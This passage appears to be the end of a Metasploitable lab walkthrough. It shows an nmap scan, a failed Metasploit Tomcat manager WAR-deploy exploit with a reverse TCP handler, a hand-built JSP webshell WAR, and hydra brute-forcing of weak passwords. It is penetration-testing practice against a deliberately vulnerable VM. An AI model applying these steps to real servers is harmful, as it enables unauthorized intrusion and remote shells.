Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:40 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).

PORT     STATE SERVICE VERSION
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
```

The old classic: crack the manager password, then deploy a WAR package to get a shell.

Let Metasploit handle it:

```
msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6117 bytes as g8EZVHSRE.war ...
[*] Executing /g8EZVHSRE/ZgXpG0r8NWYiewAWxe0R7H69CsMyfi.jsp...
[-] Execution failed on g8EZVHSRE [500 Internal Server Error]
[*] Undeploying g8EZVHSRE ...
[*] Exploit completed, but no session was created.
```

So Metasploit couldn't handle it after all. The upload fails in a strange way: looking at the Tomcat manager, the file was uploaded, but apparently it can't be executed? I don't understand why; the same steps work for other people.

I also packed a JSP webshell into a WAR by hand, and that didn't work either:

```
D:\Desktop\1111>jar -cvf 222.war .\
已添加清单
正在添加: 111.jsp(输入 = 855) (输出 = 494)(压缩了 42%)
```

Strange.

# Weak passwords

Everything else is just weak passwords; a round of hydra brute-forcing takes care of them.

# Summary

The Tomcat WAR upload, the tikiwiki RCE and the distcc RCE all failed.

tikiwiki is probably because newer Metasploit versions rewrote the encoders, leaving the old modules incompatible.

Tomcat: no idea why.

distcc: the most common answer online is that it's an SSL problem, but everyone who hit this has already tried that and it doesn't solve it.

If anyone knows, ping me.

References:

  • https://stuffwithaurum.com/2015/06/13/metasploitable-walkthrough-an-exploitation-guide/